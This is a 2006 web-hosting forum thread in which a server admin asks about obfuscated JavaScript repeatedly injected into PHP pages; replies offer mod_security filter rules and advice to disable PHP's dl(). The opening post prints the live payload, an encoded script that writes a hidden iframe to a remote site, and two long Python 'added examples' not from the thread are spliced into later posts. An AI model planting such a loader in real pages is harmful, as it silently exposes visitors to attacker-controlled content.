Recurring PHP malicious document.write exploit

Discussion in 'General Discussion' started by mousepotatoe, Mar 24, 2006.

  1. mousepotatoe

    mousepotatoe Active Member

    Joined:
    Dec 17, 2003
    Messages:
    36
    Likes Received:
    0
    Trophy Points:
    6
    On my server, several sites, but not all sites, are having this code inserted into PHP pages, mainly index.php, header.php or footer.php.

    I cannot locate the source of this exploit.

    Is anyone familiar with this? Code follows:

    Code:
    <script language=javascript>
    document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%73%65%6C%66%2E%66%6F%63%75%73%28%29%3B%73%65%74%49%6E%74%65%72%76%61%6C%28%22%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%27%47%6F%6F%67%6C%65%2E%63%6F%6D%27%22%2C%37%29%3B%7D%3C%2F%73%63%72%69%70%74%3E%0D%0A'));dF('%286FLIUDPH%2853%2853vuf%286G%2855kwws%286D22zzz1vn%7Cv1frp2nlso1sks%2855%2853zlgwk%286G5%2853khljkw%286G5%2853vw%7Coh%286G%2855glvsod%7C%286Dqrqh%2855%286H%286F2LIUDPH%286H3')
    </script>
    Any help would be greatly appreciated.
     
  2. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    I'd suggest mod_security, and my mod_security ruleset that contains things to block such as this - http://www.hostmerit.com/modsec.user.conf


    To block those with modsec,
    SecFilter "document\.write"
    SecFilterSelective THE_REQUEST "<script>"

    My script contains around 30+ Javascript + XML cross site scripting code blocks.
     
  3. DigitalN

    DigitalN Well-Known Member

    Joined:
    Sep 23, 2004
    Messages:
    420
    Likes Received:
    1
    Trophy Points:
    18
    Mod security will block the requests that you filter, but the real issue is probably that the malicious php module is still being loaded via the dl() function.

    Just edit your php.ini file and change

    enable_dl = yes

    to
    enable_dl = no

    And restart apache - the problem won't reoccur then.
     
  4. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    Shouldn't it be:

    enable_dl = On
    enable_dl = Off
     
  5. mousepotatoe

    mousepotatoe Active Member

    Joined:
    Dec 17, 2003
    Messages:
    36
    Likes Received:
    0
    Trophy Points:
    6
    That's a wonderful mod_security ruleset, and thank you for writing the lines:

    SecFilter "document\.write"
    SecFilterSelective THE_REQUEST "<script>"

    I have added this to my modsec ruleset, but the malicious code is creating
    "<script language=javascript>"

    would this mod_security recognize <script language=javascript> as <script> ?

    Thanks!
     
  6. mousepotatoe

    mousepotatoe Active Member

    Joined:
    Dec 17, 2003
    Messages:
    36
    Likes Received:
    0
    Trophy Points:
    6
    enable_dl = no blocks ioncube

    If I change enable_dl = no, all my ioncube sites go down; it will not allow ioncube to load any of my ioncube encrypted sites. Is there a workaround for this?

    Thank you!
     
  7. Etheral

    Etheral Well-Known Member

    Joined:
    Dec 8, 2003
    Messages:
    208
    Likes Received:
    0
    Trophy Points:
    16

    You might NOT want to block JavaScript like that; some people use JavaScript to give their website a more interactive feel...
     
  8. tolra

    tolra Active Member

    Joined:
    Mar 4, 2006
    Messages:
    27
    Likes Received:
    0
    Trophy Points:
    1
    You can load the ioncube loaders within php.ini see the bottom of http://www.ioncube.com/loader_installation.php under "Manual Installation in the php.ini File", then you can disable dl.
     
  9. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    You have no idea what you're talking about. I suggest you find out what mod_security is, and why the comment you made makes no sense. It blocks URL requests, not page code. :rolleyes: :rolleyes:
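Added example, not from the thread: a small Python model of how the two SecFilter lines posted earlier behave when applied to a request line, which also answers the earlier question about `<script language=javascript>`. It is an approximation of ModSecurity 1.x (URL-decode the request once, then a plain regex search; case handling and the other 1.x normalisations are not modelled). The request lines are constructed for the example, and the broadened pattern is my suggestion, not one the thread gives. The model also makes the point above concrete: the snippet written into index.php travels in responses, never in THE_REQUEST, so no request filter sees it.

```python
import re
from urllib.parse import unquote

# Constructed request lines for the example (not from the thread), as they would
# appear in THE_REQUEST. The last one is the same injection, URL-encoded by the client.
REQUESTS = [
    "GET /index.php HTTP/1.1",
    "GET /search.php?q=<script>alert(1)</script> HTTP/1.1",
    "GET /search.php?q=<script language=javascript>document.write(1)</script> HTTP/1.1",
    "GET /search.php?q=%3Cscript%20language%3Djavascript%3E HTTP/1.1",
]

# The argument to SecFilter / SecFilterSelective is a regular expression.
RULES = {
    "document_write": r"document\.write",   # SecFilter "document\.write"
    "script_literal": r"<script>",          # SecFilterSelective THE_REQUEST "<script>"
    "script_any_attrs": r"<script[^>]*>",   # broadened pattern (assumption, not from the thread)
}


def normalise(request_line: str) -> str:
    """Approximation of ModSecurity 1.x normalisation: one round of URL decoding.
    Other 1.x transformations (null bytes, path normalisation, case) are not modelled."""
    return unquote(request_line)


def rule_matches(pattern: str, request_line: str) -> bool:
    """True if the regex would fire on the normalised request line."""
    return re.search(pattern, normalise(request_line)) is not None


def evaluate(requests=REQUESTS, rules=RULES) -> dict:
    """Return {rule_name: [request lines the rule would block]}."""
    return {name: [r for r in requests if rule_matches(pat, r)]
            for name, pat in rules.items()}


if __name__ == "__main__":
    for name, blocked in evaluate().items():
        print(f"{name}: blocks {len(blocked)} of {len(REQUESTS)}")
        for r in blocked:
            print("   ", r)
```

The literal `<script>` pattern only fires when `>` immediately follows `script`, so the `language=javascript` form gets through unless the pattern is widened to something like `<script[^>]*>`; the `document\.write` filter is unaffected by the tag's attributes. None of this touches files already modified on disk.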
     
  10. DigitalN

    DigitalN Well-Known Member

    Joined:
    Sep 23, 2004
    Messages:
    420
    Likes Received:
    1
    Trophy Points:
    18
    Yes,

    enable_dl = Off

    Is what you want - I was working from memory, it's as simple as that to disable this exploit.

    Enabling dl() makes your server vulnerable to any account loading a rogue module into php - load ioncube and any other legitimate modules (such as sourceguardian) into php.ini yourself, as someone mentioned.
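Added example, not from the thread or from cPanel: a Python helper that applies the fix described in the last few posts to a php.ini, forcing `enable_dl = Off` and loading the ionCube loader from php.ini with the `zend_extension` directive the ionCube installation page documents, so encoded sites keep working while injected scripts can no longer dl() a rogue module. The php.ini fragment and the loader path are constructed for the example; take the real path from the ionCube page linked earlier.

```python
import re

# Constructed php.ini fragment for the example, showing the weak setting.
# The extension_dir value is illustrative, not a real cPanel path.
WEAK_INI = """\
[PHP]
; dl() lets any script load a shared object into the interpreter
enable_dl = On
extension_dir = "/usr/local/lib/php/extensions/no-debug-non-zts-20060613"
"""

# Hypothetical loader location, an assumption for the example.
IONCUBE_LOADER = "/usr/local/ioncube/ioncube_loader_lin_5.1.so"

_TRUE = {"on", "yes", "true", "1"}


def directives(ini_text: str) -> dict:
    """Read `key = value` lines into {key: [values]} in file order, skipping
    [sections] and ; comments. Enough for the directives used here."""
    found = {}
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#[":
            continue
        key, sep, value = line.partition("=")
        if sep:
            found.setdefault(key.strip(), []).append(value.strip().strip('"'))
    return found


def dl_enabled(ini_text: str) -> bool:
    """True if scripts can call dl(). PHP accepts On/Off, Yes/No, True/False and 1/0,
    the last occurrence wins, and the PHP 5 built-in default when the directive is
    absent altogether is On."""
    values = directives(ini_text).get("enable_dl")
    if not values:
        return True
    return values[-1].lower() in _TRUE


def harden_php_ini(ini_text: str, zend_extensions=()) -> str:
    """Force enable_dl = Off (rewriting any existing setting, whatever spelling it
    used) and make sure every loader in zend_extensions is loaded by php.ini, so
    the scripts that used to dl() it no longer need to. Idempotent."""
    out, seen = [], False
    for line in ini_text.splitlines():
        if re.match(r"\s*enable_dl\s*=", line):
            out.append("enable_dl = Off")
            seen = True
        else:
            out.append(line)
    if not seen:
        out.append("enable_dl = Off")
    already = set(directives("\n".join(out)).get("zend_extension", []))
    for path in zend_extensions:
        if path not in already:
            out.append(f'zend_extension = "{path}"')
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    fixed = harden_php_ini(WEAK_INI, [IONCUBE_LOADER])
    print(fixed)
    print("dl() enabled before:", dl_enabled(WEAK_INI), "after:", dl_enabled(fixed))
```

After writing the result back, restart Apache and confirm with `php -i | grep enable_dl` that the running interpreter reports Off; a loader that is missing from php.ini shows up as the encoded sites failing to load, the symptom reported earlier in the thread, so add each encoder's loader here before turning dl() off.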
     
  11. mousepotatoe

    mousepotatoe Active Member

    Joined:
    Dec 17, 2003
    Messages:
    36
    Likes Received:
    0
    Trophy Points:
    6
    Disabled dl() and can't run source guardian

    Disabling the dl() function is wreaking havoc on many of my websites. I had to load ioncube into the php.ini and got past that, and have added source guardian to php.ini but am getting the following error.

    I have tried

    and
    with no luck.
    Any suggestions?

    Thank you
     